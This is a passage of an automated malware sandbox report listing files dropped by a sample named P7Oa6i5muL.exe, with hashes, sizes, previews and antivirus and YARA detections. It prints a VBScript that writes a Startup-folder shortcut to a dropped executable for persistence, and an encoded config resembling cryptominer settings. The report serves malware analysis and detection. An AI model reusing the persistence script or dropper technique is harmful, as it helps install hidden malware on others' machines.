                                                                                                                                        1624980449.5267825.dllGet hashmaliciousBrowse
                                                                                                                                        • 51.81.224.98
                                                                                                                                        GJYPoFf5AE.exeGet hashmaliciousBrowse
                                                                                                                                        • 54.37.106.167

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        No context

                                                                                                                                        Dropped Files

                                                                                                                                        No context

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\ProgramData\LKBNMTFJgl\cfg
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2140
                                                                                                                                        Entropy (8bit):5.557738244951003
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:lCHUL3qQEzCmini9iqvciaXkih9icue6bhvYbUbo:EH9QWv/ih9Tue6ybUE
                                                                                                                                        MD5:2DE48065534A637941090D8F3E04044F
                                                                                                                                        SHA1:EEAB2C38DD711A9BADB8265E11963732EA9C84DB
                                                                                                                                        SHA-256:8ABF520009CEA0E0C1B67563FD89C4C0E0403744942763D843E39EED180A1ED7
                                                                                                                                        SHA-512:2D1466D5F09DF4F6628092A2D7D210728536A1649CFECAE362D907D61088E32574290A350848F161C67FE008B2E46864161134C63560763BE932C3A631A24DC1
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki
                                                                                                                                        C:\ProgramData\LKBNMTFJgl\cfgi
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2140
                                                                                                                                        Entropy (8bit):5.5574864173164125
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:lCHUL3qQEzlmini9iqvciaXkih9icue6bhvYbUbo:EH9QZv/ih9Tue6ybUE
                                                                                                                                        MD5:6CAEE3EB287981EC875E5AD3B85DBA1D
                                                                                                                                        SHA1:665E6F0252A71C6AA31A7FBCE07D9301182953C5
                                                                                                                                        SHA-256:4DD2C67C3EF1DE5A70FE97123AA01C2D7FEAFB96F079EF2DE0E64CB9D73A54A8
                                                                                                                                        SHA-512:B6C71536CC290FFE07F1638ED99588CBB8C78997A72CCDF0D8E9059D8D4C932CB8E5195F06A42DF2CBACFE650C9A4CD1616DE30D03DC947E2902C103C4A7E6B8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki
                                                                                                                                        C:\ProgramData\LKBNMTFJgl\csrss
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2241536
                                                                                                                                        Entropy (8bit):7.994950828794957
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:49152:7wFpwLN5DX5ecu7O4jrimxMHDUrY+BPOIz8uJxLWuXoK:8wLf8qHa1eunvXoK
                                                                                                                                        MD5:9DBCF183762872D8917B8A19535A0C65
                                                                                                                                        SHA1:94D27127F8FFBEBEC6AD803599ED3C0477A15E3C
                                                                                                                                        SHA-256:759D3E20098353E73C0C417ECF755A3AB24CDF7EAD10DF8C5A4AAB549D7423F2
                                                                                                                                        SHA-512:CD3FB751C0360DF6865633D72633403C0802153727FE75951E842227B4237970DF999229C73D1E94D9E0F0B0442EC58EC59024836EBEF3F7605254BC6A4F82B6
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BT...............0... .........F. .. .... ...@.. ........................"...........@................................... .O..... ......................."...... .............................................. ............... ..H............text...L. .. .... ................. ..`.rsrc......... ....... .............@..@.reloc........"......2".............@..B................(. .....H........2...#......8....V...O ..........................................*.*.*..(....*..(....*..(....*.*.*.*..(....*..(....*..(....*.*.*.*..(....*..(....*..(....*..{....*"..}....*..(....*..{....*"..}....*..(....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*.s....r...p(....o....(......o....*..{....,..{.....s....%.o....o....*..(....*....0..G........(......+-~....%-.&~......K...s....%.....s....(......X....2. .U..( .
                                                                                                                                        C:\ProgramData\LKBNMTFJgl\e9c1286a28_3.1.0
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3272
                                                                                                                                        Entropy (8bit):3.5391176048802047
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:PnPWWWWWWWWWWciWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWr:0wfIa
                                                                                                                                        MD5:97336FD69071FE322CC57F730C0EA273
                                                                                                                                        SHA1:97C86F938D64DD5EB84BDD6D0C16AC73B0762590
                                                                                                                                        SHA-256:F5C9FAF94FDBE5C9317FC89D5536B1CF3D0520EFB17A504DD9AA0E15F9607CF6
                                                                                                                                        SHA-512:160225663F7EC8D181AD5DC4E51ADE2E1AAE76B6D456B17B68E6E1D340290A21AF000CA297ED298C7D6B7B12DB8679EA81AA90EEDF2D92017E8C2CA93D289ADC
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: H\@.BK.WUGB..VTV_A]Z[.V@S......801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125_LMB..................XVC]EYT.WMR892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892
                                                                                                                                        C:\ProgramData\LKBNMTFJgl\r.vbs
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):652
                                                                                                                                        Entropy (8bit):3.6256011936570958
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:DJhvugypjBQMyol3qMJsW+jCRAbjMwCdKIiDHvhFkqy30mgZM3LCKKvbMX4FHkqc:DJhLStyjCyjMKFNyEmgZMbaDMoFHNc
                                                                                                                                        MD5:8EC848878E04E0B80C90077A0AA76AF6
                                                                                                                                        SHA1:BF2FAA04A37B4CC49E48808D7584B02A35C53D5A
                                                                                                                                        SHA-256:24EEFD5A0A5E3C019A44AA704F1560DB35E59CB36E0270A389D55E35DFF11F1F
                                                                                                                                        SHA-512:486DFA27D1A54E3EF5A2B9EABA76CE74FEE9045C75D8B4EBFF2DF3966AB833C02139EED8B9EA9C2B32AB77B6D9D2F0FAC6FC4A9B661AF825EB36AA43C71C63AA
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: S.e.t. .o.b.j.F.S.O.=.C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).....o.u.t.F.i.l.e.=.".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.S.t.a.r.t.u.p.\.v.i.T.R.M.U.u.K.e.V...u.r.l.".....S.e.t. .o.b.j.F.i.l.e. .=. .o.b.j.F.S.O...C.r.e.a.t.e.T.e.x.t.F.i.l.e.(.o.u.t.F.i.l.e.,.T.r.u.e.).....o.b.j.F.i.l.e...W.r.i.t.e. .".[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.].". .&. .v.b.C.r.L.f. .&. .".U.R.L.=.".".f.i.l.e.:./././.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.L.K.B.N.M.T.F.J.g.l.\.c.s.r.s.s...e.x.e.".".".....o.b.j.F.i.l.e...C.l.o.s.e.......
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4096
                                                                                                                                        Entropy (8bit):0.5943821504566759
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:0F2A/ek1GaD0JOCEfMuaaD0JOCEfMKQmDfAl/gz2cE0fMbhEZolrRSQ2hyYIIT:04A/NGaD0JcaaD0JwQQfAg/0bjSQJ
                                                                                                                                        MD5:15163B4DCEC767FE2A39672AD17D614F
                                                                                                                                        SHA1:E435F1D8CC17D1D96F72B9B011C48E8E76366649
                                                                                                                                        SHA-256:9DDCCC4ACF8924851DDE42C3BBD01E4A453C6CAFAF47F60A0821B72E4623CDA8
                                                                                                                                        SHA-512:0A9F79ED9693ED5493098D69A2355498F829E3F74C57CA5362A676577FDB2F97D4D8A02CDD0C50F00D812AE37BB5D2095E0942B34054B0F82606D21E60756727
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ......:{..(..........yk.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................yk...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x304c9aab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):0.09587280019020472
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:mG0+Iie1O4bltrivqKAG0+Iie1O4bltrivqK:Kz1m+z1m
                                                                                                                                        MD5:5E6A0BF8B8E67A9796B8E1BD440D0D2A
                                                                                                                                        SHA1:8C21B11FB12428069ACAAF089DD850CB03395249
                                                                                                                                        SHA-256:3846F46D21DB2F88487B4144D55A4E9CFB1CA1597F0C6E8C4F35494D4E49D5AF
                                                                                                                                        SHA-512:C64634777C52DB1509A8561E8BFB7DA663C460F1EAFDA7BC25E2CDB75E388C797742FA6B3F4144FB22CD02E23A1AECCCD53C941320BF1892F06C5F55A261E3B3
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 0L..... ................e.f.3...w........................&..........w.......yk.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................Y.......y.k........................y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8192
                                                                                                                                        Entropy (8bit):0.11134254793031642
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Ij17Ev9btjXl/bJdAtizz9ric+lill:Ipidt7t4U9rivG
                                                                                                                                        MD5:D2E4D6910C3A7DB1082A4BF160EC71CB
                                                                                                                                        SHA1:F2E6E8A541A655EDED45A18657770BBC3C1E7058
                                                                                                                                        SHA-256:F47D206380438278361A68D8911CD63F4055CDE0E9385C3A85888BE9D17F41D7
                                                                                                                                        SHA-512:804B4D8D20774379B499D4B688C8E3506CB1E3F0EB80C655F7C74D96063F4CB9645548EB884292F641751960979DCC3D3CAF5B324756133B364CD10830EA42D0
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ...|.....................................3...w.......y.......w...............w.......w....:O.....w..........................y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P7Oa6i5muL.exe.log
                                                                                                                                        Process:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):1299
                                                                                                                                        Entropy (8bit):5.353835388147306
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
                                                                                                                                        MD5:D7428B0428DC5FA72A41122D265CFA0E
                                                                                                                                        SHA1:F485E2EC6F980F218063AF527724C088617B3B94
                                                                                                                                        SHA-256:C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
                                                                                                                                        SHA-512:FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):0.11019582103530898
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:26koXm/Ey6q9995Rixnq3qQ10nMCldimE8eawHjcH:26kZl68sqLyMCldzE9BHjcH
                                                                                                                                        MD5:1637C0E46D3E4CC6E3590F1A58D74D71
                                                                                                                                        SHA1:74E8849D3B1118B9FD8230187A2772FB3947AF5B
                                                                                                                                        SHA-256:21E2219750F653C2B6628B0F1C4D24AE09C7E347CB5ECC7996105A48683EF047
                                                                                                                                        SHA-512:828D226485F6000F6397F37441F384708122F568A566717622DEA1A72259969B69933B6413B518DC0BD33115C4240BB87BE590A402B60D90C013CF144E5A7461
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .........................................................................................v.6.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...............................................................0..... .....ktq..x..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P............6....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):0.11282319316751449
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:AnpYVXm/Ey6q9995RivW1miM3qQ10nMCldimE8eawHza1miI9N:YpY4l6831tMLyMCldzE9BHza1tI9N
                                                                                                                                        MD5:3CA74F29176125DA9D8672B5A7A6686B
                                                                                                                                        SHA1:6059DDFAF9A43B0EFDEA1DD79DC1F583E5932C75
                                                                                                                                        SHA-256:6A1F04E9D55A3888FF40056F37D146B515BAFCE457D8A404219360A43E89D81A
                                                                                                                                        SHA-512:0F21B8C545FE098C550114C1A217A49CC0F070FFBB4772DA35DD205D1B82197D4D1995BFC8C73DB10F17C3D7086F293FEFFC81D6E7F4D7C301CFD4EBDCF66705
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ........................................................................................}..6.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...............................................................0..... .....^&c..x..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........6....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):65536
                                                                                                                                        Entropy (8bit):0.11279089183546652
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:AnqXm/Ey6q9995RiS1mK2P3qQ10nMCldimE8eawHza1mKQ:Yfl68T1iPLyMCldzE9BHza1M
                                                                                                                                        MD5:B29A25E97FA88A6DD5536BB938395E34
                                                                                                                                        SHA1:38139615A7455B20F5A7D93D08EAFC5A2D73797C
                                                                                                                                        SHA-256:2021C527B7EBCAA1359CE6E80E10C6472AAC350E608E545494810A4E70D901FE
                                                                                                                                        SHA-512:C50F0259AA6DAC7A58F4052CE516D3EB88EEB4AD17F3AE580321DAED1AB4526923DB7447E7B2694ED4457C438754205A852AA0A730F700F3F28AF3E433E9B4CC
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ...........................................................................................6.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...............................................................0..... .......[..x..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........g%.6....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        Process:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2241536
                                                                                                                                        Entropy (8bit):7.994950828794957
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:49152:7wFpwLN5DX5ecu7O4jrimxMHDUrY+BPOIz8uJxLWuXoK:8wLf8qHa1eunvXoK
                                                                                                                                        MD5:9DBCF183762872D8917B8A19535A0C65
                                                                                                                                        SHA1:94D27127F8FFBEBEC6AD803599ED3C0477A15E3C
                                                                                                                                        SHA-256:759D3E20098353E73C0C417ECF755A3AB24CDF7EAD10DF8C5A4AAB549D7423F2
                                                                                                                                        SHA-512:CD3FB751C0360DF6865633D72633403C0802153727FE75951E842227B4237970DF999229C73D1E94D9E0F0B0442EC58EC59024836EBEF3F7605254BC6A4F82B6
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BT...............0... .........F. .. .... ...@.. ........................"...........@................................... .O..... ......................."...... .............................................. ............... ..H............text...L. .. .... ................. ..`.rsrc......... ....... .............@..@.reloc........"......2".............@..B................(. .....H........2...#......8....V...O ..........................................*.*.*..(....*..(....*..(....*.*.*.*..(....*..(....*..(....*.*.*.*..(....*..(....*..(....*..{....*"..}....*..(....*..{....*"..}....*..(....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*.s....r...p(....o....(......o....*..{....,..{.....s....%.o....o....*..(....*....0..G........(......+-~....%-.&~......K...s....%.....s....(......X....2. .U..( .
                                                                                                                                        C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe:Zone.Identifier
                                                                                                                                        Process:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
                                                                                                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"file:///C:\ProgramData\LKBNMTFJgl\csrss.exe">), ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):69
                                                                                                                                        Entropy (8bit):5.096227769358395
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:HRAbABGQYm8h6rXZkRE4rsjvKaBCH:HRYFVm8hAW1rsjv/E
                                                                                                                                        MD5:E03E6937BA1878ACE3D849B233ADECFE
                                                                                                                                        SHA1:AFFBB4F8B53AF6CF35660B775A0A8F70FB95F8B5
                                                                                                                                        SHA-256:9846A8975F8E2DBC96CD18D5015C03B4D8226FDDF69BCB99A0610C855B0A9E6D
                                                                                                                                        SHA-512:99EA03B8635D89409C6E65DC1DD1E995EAC8C02E373F3B01FAA7D715F347722075CC0D5D629914399505A2CA8FFB80BFA8CAFA9D99A2E702D1FCD94FB0BAECA9
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, Author: @itsreallynick (Nick Carr)
                                                                                                                                        Preview: [InternetShortcut]..URL="file:///C:\ProgramData\LKBNMTFJgl\csrss.exe"
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):55
                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):906
                                                                                                                                        Entropy (8bit):3.1451406488401816
                                                                                                                                        Encrypted:false
